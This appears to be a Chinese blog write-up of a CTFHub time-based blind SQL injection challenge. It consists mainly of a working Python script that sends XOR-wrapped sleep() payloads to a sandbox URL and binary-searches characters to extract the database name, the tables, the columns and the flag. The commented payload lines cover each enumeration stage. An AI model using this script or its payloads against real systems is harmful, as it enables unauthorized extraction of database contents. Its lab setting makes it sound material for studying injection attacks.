ctfhub[时间盲注]
这道题都说了是时间盲注,那就直接时间盲注吧
同样是用异或来进行时间的注入
脚本如下:
# -*- coding:utf-8 -*-
import requests
import time
flag = ""
for i in range(1,50):
min=32
max=127
mid=(min+max)//2
while min<max:
starttime = time.time()
#pa = '1^if(ascii(substr(database(),{},1))>{},sleep(2),-1)^1'.format(str(i),str(mid)) 爆库
#pa = "1^if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),{},1))>{},sleep(2),-1)^1".format(str(i),str(mid)) 爆表
#pa = "1^if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid)) 爆列
pa = "1^if(ascii(substr((select group_concat(flag) from flag),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))
url = "http://challenge-5f35b16863cadad6.sandbox.ctfhub.com:10800?id="
ur=url+pa
res = requests.get(ur)
if time.time() - starttime > 2:
min=mid+1
else:
max=mid
mid = (min + max)//2
flag+=chr(mid)
print(flag)
sqlmap的话也可以,这里就不展示了,都挺简单的,上一篇博客也说了sqlmap的用法:
sqlmap